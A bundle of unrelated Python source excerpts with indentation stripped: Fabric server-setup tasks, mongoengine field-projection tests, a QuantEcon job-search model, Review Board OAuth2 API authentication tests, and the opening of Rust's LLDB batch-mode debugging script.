kn = prompt('Set key name which will be saved as ~/.ssh/{keyname}.rsa', default='key', validate='\w+')
put(local_key_fn, '/home/{u}/.ssh/{kn}.rsa'.format(u=username, kn=kn), use_sudo=True, mode=0o600)
sudo('chown {u}:{u} /home/{u}/.ssh/{kn}.rsa'.format(u=username, kn=kn))
h = p = u = None
while True:
h = prompt('Set hostname for which will be used ~/.ssh/{}.rsa key (without port!)'.format(kn),
default='github.com', validate='.+')
p = prompt('Set port for which will be used ~/.ssh/{}.rsa key e.g. "22" (not requirement)'.format(kn),
default='', validate='|\d+')
u = prompt('Set user for which will be used ~/.ssh/{}.rsa key e.g. "git" (not requirement)'.format(kn),
validate='|\w+')
print_yellow(('HostHame: {h}\n'
'Port: {p}\n'
'User: {u}').format(h=h, p=(p or '-NONE-'), u=(u or '-NONE-')))
if confirm('Are you confirm it?'):
break
cf = '~/.ssh/config'
with settings(sudo_user=username, user=username, group=username):
append(cf, '\nHost {}'.format(h), use_sudo=True)
append(cf, '\tHostName {}'.format(h), use_sudo=True)
append(cf, '\tIdentityFile ~/.ssh/{}.rsa'.format(kn), use_sudo=True)
if p:
append(cf, '\tPort {}'.format(p), use_sudo=True)
if u:
append(cf, '\tUser {}'.format(u), use_sudo=True)
else:
abort('Unknown method')
print_green('INFO: Set SSH key... OK')
@task
def service_restart(service_name, attempt=20):
"""
service ... stop; service ... start
"""
check_sudo()
check_os()
n = 1
while True:
r = sudo('service {s} stop; service {s} start'.format(s=service_name), warn_only=True)
if r.succeeded:
break
if n >= attempt:
abort('')
n += 1
time.sleep(1)
@task
def server_reboot():
"""
Reboot host
"""
check_sudo()
check_os()
if not confirm('Do you want to reboot server?'):
return
reboot(wait=180)
@task
def update_locale():
"""
Setup en_US.UTF-8 system locale
"""
check_sudo()
check_os()
comment('/etc/locale.gen', r'^[^#]', use_sudo=True)
uncomment('/etc/locale.gen', r'en_US\.UTF\-8', use_sudo=True, backup='')
sudo('locale-gen')
sudo('echo \'LANGUAGE="en_US.UTF-8"\' > /etc/default/locale') # will be locale warning. it's ok
sudo('echo \'LANG="en_US.UTF-8"\' >> /etc/default/locale')
sudo('echo \'LC_ALL="en_US.UTF-8"\' >> /etc/default/locale')
disconnect_all()
|
|
import unittest
from mongoengine import *
from mongoengine.queryset import QueryFieldList
__all__ = ("QueryFieldListTest", "OnlyExcludeAllTest")
class QueryFieldListTest(unittest.TestCase):
def test_empty(self):
q = QueryFieldList()
self.assertFalse(q)
q = QueryFieldList(always_include=['_cls'])
self.assertFalse(q)
def test_include_include(self):
q = QueryFieldList()
q += QueryFieldList(fields=['a', 'b'], value=QueryFieldList.ONLY, _only_called=True)
self.assertEqual(q.as_dict(), {'a': 1, 'b': 1})
q += QueryFieldList(fields=['b', 'c'], value=QueryFieldList.ONLY)
self.assertEqual(q.as_dict(), {'a': 1, 'b': 1, 'c': 1})
def test_include_exclude(self):
q = QueryFieldList()
q += QueryFieldList(fields=['a', 'b'], value=QueryFieldList.ONLY)
self.assertEqual(q.as_dict(), {'a': 1, 'b': 1})
q += QueryFieldList(fields=['b', 'c'], value=QueryFieldList.EXCLUDE)
self.assertEqual(q.as_dict(), {'a': 1})
def test_exclude_exclude(self):
q = QueryFieldList()
q += QueryFieldList(fields=['a', 'b'], value=QueryFieldList.EXCLUDE)
self.assertEqual(q.as_dict(), {'a': 0, 'b': 0})
q += QueryFieldList(fields=['b', 'c'], value=QueryFieldList.EXCLUDE)
self.assertEqual(q.as_dict(), {'a': 0, 'b': 0, 'c': 0})
def test_exclude_include(self):
q = QueryFieldList()
q += QueryFieldList(fields=['a', 'b'], value=QueryFieldList.EXCLUDE)
self.assertEqual(q.as_dict(), {'a': 0, 'b': 0})
q += QueryFieldList(fields=['b', 'c'], value=QueryFieldList.ONLY)
self.assertEqual(q.as_dict(), {'c': 1})
def test_always_include(self):
q = QueryFieldList(always_include=['x', 'y'])
q += QueryFieldList(fields=['a', 'b', 'x'], value=QueryFieldList.EXCLUDE)
q += QueryFieldList(fields=['b', 'c'], value=QueryFieldList.ONLY)
self.assertEqual(q.as_dict(), {'x': 1, 'y': 1, 'c': 1})
def test_reset(self):
q = QueryFieldList(always_include=['x', 'y'])
q += QueryFieldList(fields=['a', 'b', 'x'], value=QueryFieldList.EXCLUDE)
q += QueryFieldList(fields=['b', 'c'], value=QueryFieldList.ONLY)
self.assertEqual(q.as_dict(), {'x': 1, 'y': 1, 'c': 1})
q.reset()
self.assertFalse(q)
q += QueryFieldList(fields=['b', 'c'], value=QueryFieldList.ONLY)
self.assertEqual(q.as_dict(), {'x': 1, 'y': 1, 'b': 1, 'c': 1})
def test_using_a_slice(self):
q = QueryFieldList()
q += QueryFieldList(fields=['a'], value={"$slice": 5})
self.assertEqual(q.as_dict(), {'a': {"$slice": 5}})
class OnlyExcludeAllTest(unittest.TestCase):
def setUp(self):
connect(db='mongoenginetest')
class Person(Document):
name = StringField()
age = IntField()
meta = {'allow_inheritance': True}
Person.drop_collection()
self.Person = Person
def test_mixing_only_exclude(self):
class MyDoc(Document):
a = StringField()
b = StringField()
c = StringField()
d = StringField()
e = StringField()
f = StringField()
include = ['a', 'b', 'c', 'd', 'e']
exclude = ['d', 'e']
only = ['b', 'c']
qs = MyDoc.objects.fields(**{i: 1 for i in include})
self.assertEqual(qs._loaded_fields.as_dict(),
{'a': 1, 'b': 1, 'c': 1, 'd': 1, 'e': 1})
qs = qs.only(*only)
self.assertEqual(qs._loaded_fields.as_dict(), {'b': 1, 'c': 1})
qs = qs.exclude(*exclude)
self.assertEqual(qs._loaded_fields.as_dict(), {'b': 1, 'c': 1})
qs = MyDoc.objects.fields(**{i: 1 for i in include})
qs = qs.exclude(*exclude)
self.assertEqual(qs._loaded_fields.as_dict(), {'a': 1, 'b': 1, 'c': 1})
qs = qs.only(*only)
self.assertEqual(qs._loaded_fields.as_dict(), {'b': 1, 'c': 1})
qs = MyDoc.objects.exclude(*exclude)
qs = qs.fields(**{i: 1 for i in include})
self.assertEqual(qs._loaded_fields.as_dict(), {'a': 1, 'b': 1, 'c': 1})
qs = qs.only(*only)
self.assertEqual(qs._loaded_fields.as_dict(), {'b': 1, 'c': 1})
def test_slicing(self):
class MyDoc(Document):
a = ListField()
b = ListField()
c = ListField()
d = ListField()
e = ListField()
f = ListField()
include = ['a', 'b', 'c', 'd', 'e']
exclude = ['d', 'e']
only = ['b', 'c']
qs = MyDoc.objects.fields(**{i: 1 for i in include})
qs = qs.exclude(*exclude)
qs = qs.only(*only)
qs = qs.fields(slice__b=5)
self.assertEqual(qs._loaded_fields.as_dict(),
{'b': {'$slice': 5}, 'c': 1})
qs = qs.fields(slice__c=[5, 1])
self.assertEqual(qs._loaded_fields.as_dict(),
{'b': {'$slice': 5}, 'c': {'$slice': [5, 1]}})
qs = qs.exclude('c')
self.assertEqual(qs._loaded_fields.as_dict(),
{'b': {'$slice': 5}})
def test_mix_slice_with_other_fields(self):
class MyDoc(Document):
a = ListField()
b = ListField()
c = ListField()
qs = MyDoc.objects.fields(a=1, b=0, slice__c=2)
self.assertEqual(qs._loaded_fields.as_dict(),
{'c': {'$slice': 2}, 'a': 1})
def test_only(self):
"""Ensure that QuerySet.only only returns the requested fields.
"""
person = self.Person(name='test', age=25)
person.save()
obj = self.Person.objects.only('name').get()
self.assertEqual(obj.name, person.name)
self.assertEqual(obj.age, None)
obj = self.Person.objects.only('age').get()
self.assertEqual(obj.name, None)
self.assertEqual(obj.age, person.age)
obj = self.Person.objects.only('name', 'age').get()
self.assertEqual(obj.name, person.name)
self.assertEqual(obj.age, person.age)
obj = self.Person.objects.only(*('id', 'name',)).get()
self.assertEqual(obj.name, person.name)
self.assertEqual(obj.age, None)
# Check polymorphism still works
class Employee(self.Person):
salary = IntField(db_field='wage')
employee = Employee(name='test employee', age=40, salary=30000)
employee.save()
obj = self.Person.objects(id=employee.id).only('age').get()
self.assertTrue(isinstance(obj, Employee))
# Check field names are looked up properly
obj = Employee.objects(id=employee.id).only('salary').get()
self.assertEqual(obj.salary, employee.salary)
self.assertEqual(obj.name, None)
def test_only_with_subfields(self):
class User(EmbeddedDocument):
name = StringField()
email = StringField()
class Comment(EmbeddedDocument):
title = StringField()
text = StringField()
class BlogPost(Document):
content = StringField()
author = EmbeddedDocumentField(User)
comments = ListField(EmbeddedDocumentField(Comment))
BlogPost.drop_collection()
post = BlogPost(content='Had a good coffee today...')
post.author = User(name='Test User')
post.comments = [Comment(title='I aggree', text='Great post!'), Comment(title='Coffee', text='I hate coffee')]
post.save()
obj = BlogPost.objects.only('author.name',).get()
self.assertEqual(obj.content, None)
self.assertEqual(obj.author.email, None)
self.assertEqual(obj.author.name, 'Test User')
self.assertEqual(obj.comments, [])
obj = BlogPost.objects.only('content', 'comments.title',).get()
self.assertEqual(obj.content, 'Had a good coffee today...')
self.assertEqual(obj.author, None)
self.assertEqual(obj.comments[0].title, 'I aggree')
self.assertEqual(obj.comments[1].title, 'Coffee')
self.assertEqual(obj.comments[0].text, None)
self.assertEqual(obj.comments[1].text, None)
obj = BlogPost.objects.only('comments',).get()
self.assertEqual(obj.content, None)
self.assertEqual(obj.author, None)
self.assertEqual(obj.comments[0].title, 'I aggree')
self.assertEqual(obj.comments[1].title, 'Coffee')
self.assertEqual(obj.comments[0].text, 'Great post!')
self.assertEqual(obj.comments[1].text, 'I hate coffee')
BlogPost.drop_collection()
def test_exclude(self):
class User(EmbeddedDocument):
name = StringField()
email = StringField()
class Comment(EmbeddedDocument):
title = StringField()
text = StringField()
class BlogPost(Document):
content = StringField()
author = EmbeddedDocumentField(User)
comments = ListField(EmbeddedDocumentField(Comment))
BlogPost.drop_collection()
post = BlogPost(content='Had a good coffee today...')
post.author = User(name='Test User')
post.comments = [Comment(title='I aggree', text='Great post!'), Comment(title='Coffee', text='I hate coffee')]
post.save()
obj = BlogPost.objects.exclude('author', 'comments.text').get()
self.assertEqual(obj.author, None)
self.assertEqual(obj.content, 'Had a good coffee today...')
self.assertEqual(obj.comments[0].title, 'I aggree')
self.assertEqual(obj.comments[0].text, None)
BlogPost.drop_collection()
def test_exclude_only_combining(self):
class Attachment(EmbeddedDocument):
name = StringField()
content = StringField()
class Email(Document):
sender = StringField()
to = StringField()
subject = StringField()
body = StringField()
content_type = StringField()
attachments = ListField(EmbeddedDocumentField(Attachment))
Email.drop_collection()
email = Email(sender='me', to='you', subject='From Russia with Love', body='Hello!', content_type='text/plain')
email.attachments = [
Attachment(name='file1.doc', content='ABC'),
Attachment(name='file2.doc', content='XYZ'),
]
email.save()
obj = Email.objects.exclude('content_type').exclude('body').get()
self.assertEqual(obj.sender, 'me')
self.assertEqual(obj.to, 'you')
self.assertEqual(obj.subject, 'From Russia with Love')
self.assertEqual(obj.body, None)
self.assertEqual(obj.content_type, None)
obj = Email.objects.only('sender', 'to').exclude('body', 'sender').get()
self.assertEqual(obj.sender, None)
self.assertEqual(obj.to, 'you')
self.assertEqual(obj.subject, None)
self.assertEqual(obj.body, None)
self.assertEqual(obj.content_type, None)
obj = Email.objects.exclude('attachments.content').exclude('body').only('to', 'attachments.name').get()
self.assertEqual(obj.attachments[0].name, 'file1.doc')
self.assertEqual(obj.attachments[0].content, None)
self.assertEqual(obj.sender, None)
self.assertEqual(obj.to, 'you')
self.assertEqual(obj.subject, None)
self.assertEqual(obj.body, None)
self.assertEqual(obj.content_type, None)
Email.drop_collection()
def test_all_fields(self):
class Email(Document):
sender = StringField()
to = StringField()
subject = StringField()
body = StringField()
content_type = StringField()
Email.drop_collection()
email = Email(sender='me', to='you', subject='From Russia with Love', body='Hello!', content_type='text/plain')
email.save()
obj = Email.objects.exclude('content_type', 'body').only('to', 'body').all_fields().get()
self.assertEqual(obj.sender, 'me')
self.assertEqual(obj.to, 'you')
self.assertEqual(obj.subject, 'From Russia with Love')
self.assertEqual(obj.body, 'Hello!')
self.assertEqual(obj.content_type, 'text/plain')
Email.drop_collection()
def test_slicing_fields(self):
"""Ensure that query slicing an array works.
"""
class Numbers(Document):
n = ListField(IntField())
Numbers.drop_collection()
numbers = Numbers(n=[0, 1, 2, 3, 4, 5, -5, -4, -3, -2, -1])
numbers.save()
# first three
numbers = Numbers.objects.fields(slice__n=3).get()
self.assertEqual(numbers.n, [0, 1, 2])
# last three
numbers = Numbers.objects.fields(slice__n=-3).get()
self.assertEqual(numbers.n, [-3, -2, -1])
# skip 2, limit 3
numbers = Numbers.objects.fields(slice__n=[2, 3]).get()
self.assertEqual(numbers.n, [2, 3, 4])
# skip to fifth from last, limit 4
numbers = Numbers.objects.fields(slice__n=[-5, 4]).get()
self.assertEqual(numbers.n, [-5, -4, -3, -2])
# skip to fifth from last, limit 10
numbers = Numbers.objects.fields(slice__n=[-5, 10]).get()
self.assertEqual(numbers.n, [-5, -4, -3, -2, -1])
# skip to fifth from last, limit 10 dict method
numbers = Numbers.objects.fields(n={"$slice": [-5, 10]}).get()
self.assertEqual(numbers.n, [-5, -4, -3, -2, -1])
def test_slicing_nested_fields(self):
"""Ensure that query slicing an embedded array works.
"""
class EmbeddedNumber(EmbeddedDocument):
n = ListField(IntField())
class Numbers(Document):
embedded = EmbeddedDocumentField(EmbeddedNumber)
Numbers.drop_collection()
numbers = Numbers()
numbers.embedded = EmbeddedNumber(n=[0, 1, 2, 3, 4, 5, -5, -4, -3, -2, -1])
numbers.save()
# first three
numbers = Numbers.objects.fields(slice__embedded__n=3).get()
self.assertEqual(numbers.embedded.n, [0, 1, 2])
# last three
numbers = Numbers.objects.fields(slice__embedded__n=-3).get()
self.assertEqual(numbers.embedded.n, [-3, -2, -1])
# skip 2, limit 3
numbers = Numbers.objects.fields(slice__embedded__n=[2, 3]).get()
self.assertEqual(numbers.embedded.n, [2, 3, 4])
# skip to fifth from last, limit 4
numbers = Numbers.objects.fields(slice__embedded__n=[-5, 4]).get()
self.assertEqual(numbers.embedded.n, [-5, -4, -3, -2])
# skip to fifth from last, limit 10
numbers = Numbers.objects.fields(slice__embedded__n=[-5, 10]).get()
self.assertEqual(numbers.embedded.n, [-5, -4, -3, -2, -1])
# skip to fifth from last, limit 10 dict method
numbers = Numbers.objects.fields(embedded__n={"$slice": [-5, 10]}).get()
self.assertEqual(numbers.embedded.n, [-5, -4, -3, -2, -1])
def test_exclude_from_subclasses_docs(self):
class Base(Document):
username = StringField()
meta = {'allow_inheritance': True}
class Anon(Base):
anon = BooleanField()
class User(Base):
password = StringField()
wibble = StringField()
Base.drop_collection()
User(username="mongodb", password="secret").save()
user = Base.objects().exclude("password", "wibble").first()
self.assertEqual(user.password, None)
self.assertRaises(LookUpError, Base.objects.exclude, "made_up")
if __name__ == '__main__':
unittest.main()
|
|
"""
Filename: odu.py
Authors: Thomas Sargent, John Stachurski
Solves the "Offer Distribution Unknown" Model by value function
iteration and a second faster method discussed in the corresponding
quantecon lecture.
"""
from textwrap import dedent
from scipy.interpolate import LinearNDInterpolator
from scipy.integrate import fixed_quad
from scipy.stats import beta as beta_distribution
from scipy import interp
from numpy import maximum as npmax
import numpy as np
class SearchProblem(object):
"""
A class to store a given parameterization of the "offer distribution
unknown" model.
Parameters
----------
beta : scalar(float), optional(default=0.95)
The discount parameter
c : scalar(float), optional(default=0.6)
The unemployment compensation
F_a : scalar(float), optional(default=1)
First parameter of beta distribution on F
F_b : scalar(float), optional(default=1)
Second parameter of beta distribution on F
G_a : scalar(float), optional(default=3)
First parameter of beta distribution on G
G_b : scalar(float), optional(default=1.2)
Second parameter of beta distribution on G
w_max : scalar(float), optional(default=2)
Maximum wage possible
w_grid_size : scalar(int), optional(default=40)
Size of the grid on wages
pi_grid_size : scalar(int), optional(default=40)
Size of the grid on probabilities
Attributes
----------
beta, c, w_max : see Parameters
w_grid : np.ndarray
Grid points over wages, ndim=1
pi_grid : np.ndarray
Grid points over pi, ndim=1
grid_points : np.ndarray
Combined grid points, ndim=2
F : scipy.stats._distn_infrastructure.rv_frozen
Beta distribution with params (F_a, F_b), scaled by w_max
G : scipy.stats._distn_infrastructure.rv_frozen
Beta distribution with params (G_a, G_b), scaled by w_max
f : function
Density of F
g : function
Density of G
pi_min : scalar(float)
Minimum of grid over pi
pi_max : scalar(float)
Maximum of grid over pi
"""
def __init__(self, beta=0.95, c=0.6, F_a=1, F_b=1, G_a=3, G_b=1.2,
w_max=2, w_grid_size=40, pi_grid_size=40):
self.beta, self.c, self.w_max = beta, c, w_max
self.F = beta_distribution(F_a, F_b, scale=w_max)
self.G = beta_distribution(G_a, G_b, scale=w_max)
self.f, self.g = self.F.pdf, self.G.pdf # Density functions
self.pi_min, self.pi_max = 1e-3, 1 - 1e-3 # Avoids instability
self.w_grid = np.linspace(0, w_max, w_grid_size)
self.pi_grid = np.linspace(self.pi_min, self.pi_max, pi_grid_size)
x, y = np.meshgrid(self.w_grid, self.pi_grid)
self.grid_points = np.column_stack((x.ravel(1), y.ravel(1)))
def __repr__(self):
m = "SearchProblem(beta={b}, c={c}, F_a={fa}, F_b={fb}, G_a={ga}, "
m += "G_b={gb}, w_max={wu}, w_grid_size={wgs}, pi_grid_size={pgs})"
fa, fb = self.F.args
ga, gb = self.G.args
return m.format(b=self.beta, c=self.c, fa=fa, fb=fb, ga=ga,
gb=gb, wu=self.w_grid.max(),
wgs=self.w_grid.size, pgs=self.pi_grid.size)
def __str__(self):
m = """\
SearchProblem (offer distribution unknown):
- beta (discount factor) : {b:g}
- c (unemployment compensation) : {c}
- F (distribution F) : Beta({fa}, {fb:g})
- G (distribution G) : Beta({ga}, {gb:g})
- w bounds (bounds for wage offers) : ({wl:g}, {wu:g})
- w grid size (number of points in grid for wage) : {wgs}
- pi bounds (bounds for probability of dist f) : ({pl:g}, {pu:g})
- pi grid size (number of points in grid for pi) : {pgs}
"""
fa, fb = self.F.args
ga, gb = self.G.args
return dedent(m.format(b=self.beta, c=self.c, fa=fa, fb=fb, ga=ga,
gb=gb,
wl=self.w_grid.min(), wu=self.w_grid.max(),
wgs=self.w_grid.size,
pl=self.pi_grid.min(), pu=self.pi_grid.max(),
pgs=self.pi_grid.size))
def q(self, w, pi):
"""
Updates pi using Bayes' rule and the current wage observation w.
Returns
-------
new_pi : scalar(float)
The updated probability
"""
new_pi = 1.0 / (1 + ((1 - pi) * self.g(w)) / (pi * self.f(w)))
# Return new_pi when in [pi_min, pi_max] and else end points
new_pi = np.maximum(np.minimum(new_pi, self.pi_max), self.pi_min)
return new_pi
def bellman_operator(self, v):
"""
The Bellman operator. Including for comparison. Value function
iteration is not recommended for this problem. See the
reservation wage operator below.
Parameters
----------
v : array_like(float, ndim=1, length=len(pi_grid))
An approximate value function represented as a
one-dimensional array.
Returns
-------
new_v : array_like(float, ndim=1, length=len(pi_grid))
The updated value function
"""
# == Simplify names == #
f, g, beta, c, q = self.f, self.g, self.beta, self.c, self.q
vf = LinearNDInterpolator(self.grid_points, v)
N = len(v)
new_v = np.empty(N)
for i in range(N):
w, pi = self.grid_points[i, :]
v1 = w / (1 - beta)
integrand = lambda m: vf(m, q(m, pi)) * (pi * f(m)
+ (1 - pi) * g(m))
integral, error = fixed_quad(integrand, 0, self.w_max)
v2 = c + beta * integral
new_v[i] = max(v1, v2)
return new_v
def get_greedy(self, v):
"""
Compute optimal actions taking v as the value function.
Parameters
----------
v : array_like(float, ndim=1, length=len(pi_grid))
An approximate value function represented as a
one-dimensional array.
Returns
-------
policy : array_like(float, ndim=1, length=len(pi_grid))
The decision to accept or reject an offer where 1 indicates
accept and 0 indicates reject
"""
# == Simplify names == #
f, g, beta, c, q = self.f, self.g, self.beta, self.c, self.q
vf = LinearNDInterpolator(self.grid_points, v)
N = len(v)
policy = np.zeros(N, dtype=int)
for i in range(N):
w, pi = self.grid_points[i, :]
v1 = w / (1 - beta)
integrand = lambda m: vf(m, q(m, pi)) * (pi * f(m) +
(1 - pi) * g(m))
integral, error = fixed_quad(integrand, 0, self.w_max)
v2 = c + beta * integral
policy[i] = v1 > v2 # Evaluates to 1 or 0
return policy
def res_wage_operator(self, phi):
"""
Updates the reservation wage function guess phi via the operator
Q.
Parameters
----------
phi : array_like(float, ndim=1, length=len(pi_grid))
This is reservation wage guess
Returns
-------
new_phi : array_like(float, ndim=1, length=len(pi_grid))
The updated reservation wage guess.
"""
# == Simplify names == #
beta, c, f, g, q = self.beta, self.c, self.f, self.g, self.q
# == Turn phi into a function == #
phi_f = lambda p: interp(p, self.pi_grid, phi)
new_phi = np.empty(len(phi))
for i, pi in enumerate(self.pi_grid):
def integrand(x):
"Integral expression on right-hand side of operator"
return npmax(x, phi_f(q(x, pi))) * (pi*f(x) + (1 - pi)*g(x))
integral, error = fixed_quad(integrand, 0, self.w_max)
new_phi[i] = (1 - beta) * c + beta * integral
return new_phi
|
|
"""Tests for OAuth2 authentication with the web API."""
from datetime import timedelta
from django.contrib.auth.models import User
from djblets.features.testing import override_feature_check
from djblets.testing.decorators import add_fixtures
from djblets.webapi.auth.backends import reset_auth_backends
from djblets.webapi.testing.testcases import WebAPITestCaseMixin
from reviewboard.admin.siteconfig import load_site_config
from reviewboard.oauth.features import oauth2_service_feature
from reviewboard.site.models import LocalSite
from reviewboard.testing import TestCase
from reviewboard.webapi.tests.mimetypes import error_mimetype, session_mimetype
from reviewboard.webapi.tests.urls import get_session_url
class OAuth2TokenAuthTests(WebAPITestCaseMixin, TestCase):
"""Authentcaiton tests for OAuth2 tokens."""
error_mimetype = error_mimetype
fixtures = ['test_users']
def setUp(self):
super(OAuth2TokenAuthTests, self).setUp()
self.owner = User.objects.get(username='doc')
self.user = User.objects.get(username='grumpy')
def tearDown(self):
super(OAuth2TokenAuthTests, self).tearDown()
load_site_config()
reset_auth_backends()
@classmethod
def tearDownClass(cls):
super(OAuth2TokenAuthTests, cls).tearDownClass()
load_site_config()
reset_auth_backends()
def test_auth(self):
"""Testing OAuth2 authentication to the Web API with a valid token"""
application = self.create_oauth_application(user=self.owner)
token = self.create_oauth_token(application, self.user, 'session:read')
with override_feature_check(oauth2_service_feature.feature_id, True):
load_site_config()
rsp = self.api_get(get_session_url(),
HTTP_AUTHORIZATION='Bearer %s' % token.token,
expected_mimetype=session_mimetype)
self.assertIn('stat', rsp)
self.assertEqual(rsp['stat'], 'ok')
def test_auth_disabled_app(self):
"""Testing OAuth2 authentication to the Web API with a valid token
against a disabled app
"""
application = self.create_oauth_application(user=self.owner,
enabled=False)
token = self.create_oauth_token(application, self.user, 'session:read')
with override_feature_check(oauth2_service_feature.feature_id, True):
load_site_config()
rsp = self.api_get(get_session_url(),
HTTP_AUTHORIZATION='Bearer %s' % token.token,
expected_status=401)
self.assertIn('stat', rsp)
self.assertEqual(rsp['stat'], 'fail')
def test_auth_feature_disabled(self):
"""Testing OAuth2 authentication to the Web API with a valid token
with the feature disabled
"""
application = self.create_oauth_application(user=self.owner)
token = self.create_oauth_token(application, self.user, 'session:read')
with override_feature_check(oauth2_service_feature.feature_id, False):
load_site_config()
rsp = self.api_get(get_session_url(),
HTTP_AUTHORIZATION='Bearer %s' % token.token,
expected_status=401)
self.assertIn('stat', rsp)
self.assertEqual(rsp['stat'], 'fail')
def test_auth_expired(self):
"""Testing OAuth2 authentication to the Web API with an expired token
"""
application = self.create_oauth_application(user=self.owner)
token = self.create_oauth_token(application, self.user, 'session:read',
expires=timedelta(hours=-1))
with override_feature_check(oauth2_service_feature.feature_id, True):
load_site_config()
rsp = self.api_get(get_session_url(),
HTTP_AUTHORIZATION='Bearer %s' % token.token,
expected_status=401)
self.assertIn('stat', rsp)
self.assertEqual(rsp['stat'], 'fail')
def test_auth_invalid_scope(self):
"""Testing OAuth2 authentication to the Web API with a token missing
scopes"""
application = self.create_oauth_application(user=self.owner)
token = self.create_oauth_token(application, self.user)
with override_feature_check(oauth2_service_feature.feature_id, True):
load_site_config()
rsp = self.api_get(get_session_url(),
HTTP_AUTHORIZATION='Bearer %s' % token.token,
expected_status=403)
self.assertIn('stat', rsp)
self.assertEqual(rsp['stat'], 'fail')
@add_fixtures(['test_site'])
def test_auth_local_site(self):
"""Testing OAuth2 authentication to the Web API with a token limited to
a Local Site
"""
local_site = LocalSite.objects.get(pk=1)
local_site.users.add(self.user)
application = self.create_oauth_application(user=self.owner,
local_site=local_site)
token = self.create_oauth_token(application, self.user, 'session:read')
with override_feature_check(oauth2_service_feature.feature_id, True):
load_site_config()
rsp = self.api_get(get_session_url(),
HTTP_AUTHORIZATION='Bearer %s' % token.token,
expected_status=401)
self.assertIn('stat', rsp)
self.assertEqual(rsp['stat'], 'fail')
@add_fixtures(['test_site'])
def test_auth_no_local_site(self):
"""Testing OAuth2 authentication to the Web API of a Local Site with an
application not on that Local Site
"""
local_site = LocalSite.objects.get(pk=1)
local_site.users.add(self.user)
application = self.create_oauth_application(user=self.owner)
token = self.create_oauth_token(application, self.user, 'session:read')
with override_feature_check(oauth2_service_feature.feature_id, True):
load_site_config()
rsp = self.api_get(get_session_url(local_site.name),
HTTP_AUTHORIZATION='Bearer %s' % token.token,
expected_status=401)
self.assertIn('stat', rsp)
self.assertEqual(rsp['stat'], 'fail')
@add_fixtures(['test_site'])
def test_auth_no_local_site_access(self):
"""Testing OAuth2 authentication to the Web API of a Local Site with an
application on that site without access to it
"""
local_site = LocalSite.objects.get(pk=1)
self.assertFalse(local_site.is_accessible_by(self.user))
application = self.create_oauth_application(user=self.owner,
local_site=local_site)
token = self.create_oauth_token(application, self.user, 'session:read')
with override_feature_check(oauth2_service_feature.feature_id, True):
load_site_config()
rsp = self.api_get(get_session_url(local_site.name),
HTTP_AUTHORIZATION='Bearer %s' % token.token,
expected_status=401)
self.assertIn('stat', rsp)
self.assertEqual(rsp['stat'], 'fail')
@add_fixtures(['test_site'])
def test_auth_local_site_public(self):
"""Testing OAuth2 authentication to the Web API of a public Local Site
with an application on that Local Site
"""
local_site = LocalSite.objects.get(pk=1)
local_site.public = True
local_site.save(update_fields=('public',))
self.assertTrue(local_site.is_accessible_by(self.user))
application = self.create_oauth_application(user=self.owner,
local_site=local_site)
token = self.create_oauth_token(application, self.user, 'session:read')
with override_feature_check(oauth2_service_feature.feature_id, True):
load_site_config()
rsp = self.api_get(get_session_url(local_site.name),
HTTP_AUTHORIZATION='Bearer %s' % token.token,
expected_mimetype=session_mimetype)
self.assertIn('stat', rsp)
self.assertEqual(rsp['stat'], 'ok')
@add_fixtures(['test_site'])
def test_auth_local_site_member(self):
"""Testing OAuth2 authentication to the Web API of a Local Site with
with an application on a that Local Site as a member
"""
local_site = LocalSite.objects.get(pk=1)
local_site.users.add(self.user)
local_site.save(update_fields=('public',))
self.assertTrue(local_site.is_accessible_by(self.user))
application = self.create_oauth_application(user=self.owner,
local_site=local_site)
token = self.create_oauth_token(application, self.user, 'session:read')
with override_feature_check(oauth2_service_feature.feature_id, True):
load_site_config()
rsp = self.api_get(get_session_url(local_site.name),
HTTP_AUTHORIZATION='Bearer %s' % token.token,
expected_mimetype=session_mimetype)
self.assertIn('stat', rsp)
self.assertEqual(rsp['stat'], 'ok')
|
|
# Copyright 2014 The Rust Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution and at
# http://rust-lang.org/COPYRIGHT.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
# This script allows to use LLDB in a way similar to GDB's batch mode. That is, given a text file
# containing LLDB commands (one command per line), this script will execute the commands one after
# the other.
# LLDB also has the -s and -S commandline options which also execute a list of commands from a text
# file. However, this command are execute `immediately`: a the command of a `run` or `continue`
# command will be executed immediately after the `run` or `continue`, without waiting for the next
# breakpoint to be hit. This a command sequence like the following will not yield reliable results:
#
# break 11
# run
# print x
#
# Most of the time the `print` command will be executed while the program is still running will thus
# fail. Using this Python script, the above will work as expected.
from __future__ import print_function
import lldb
import os
import sys
import threading
import thread
import re
import atexit
import time
# Set this to True for additional output
DEBUG_OUTPUT = False
def print_debug(s):
"Print something if DEBUG_OUTPUT is True"
global DEBUG_OUTPUT
if DEBUG_OUTPUT:
print("DEBUG: " + str(s))
def normalize_whitespace(s):
"Replace newlines, tabs, multiple spaces, etc with exactly one space"
return re.sub("\s+", " ", s)
# This callback is registered with every breakpoint and makes sure that the frame containing the
# breakpoint location is selected
def breakpoint_callback(frame, bp_loc, dict):
"Called whenever a breakpoint is hit"
print("Hit breakpoint " + str(bp_loc))
# Select the frame and the thread containing it
frame.thread.process.SetSelectedThread(frame.thread)
frame.thread.SetSelectedFrame(frame.idx)
# Returning True means that we actually want to stop at this breakpoint
return True
# This is a list of breakpoints that are not registered with the breakpoint callback. The list is
# populated by the breakpoint listener and checked/emptied whenever a command has been executed
new_breakpoints = []
# This set contains all breakpoint ids that have already been registered with a callback, and is
# used to avoid hooking callbacks into breakpoints more than once
registered_breakpoints = set()
def execute_command(command_interpreter, command):
"Executes a single CLI command"
global new_breakpoints
global registered_breakpoints
res = lldb.SBCommandReturnObject()
print(command)
command_interpreter.HandleCommand(command, res)
if res.Succeeded():
if res.HasResult():
print(normalize_whitespace(res.GetOutput()), end = '\n')
# If the command introduced any breakpoints, make sure to register them with the breakpoint
# callback
while len(new_breakpoints) > 0:
res.Clear()
breakpoint_id = new_breakpoints.pop()
if breakpoint_id in registered_breakpoints:
print_debug("breakpoint with id %s is already registered. Ignoring." % str(breakpoint_id))
else:
print_debug("registering breakpoint callback, id = " + str(breakpoint_id))
callback_command = "breakpoint command add -F breakpoint_callback " + str(breakpoint_id)
command_interpreter.HandleCommand(callback_command, res)
if res.Succeeded():
print_debug("successfully registered breakpoint callback, id = " + str(breakpoint_id))
registered_breakpoints.add(breakpoint_id)
else:
print("Error while trying to register breakpoint callback, id = " + str(breakpoint_id))
else:
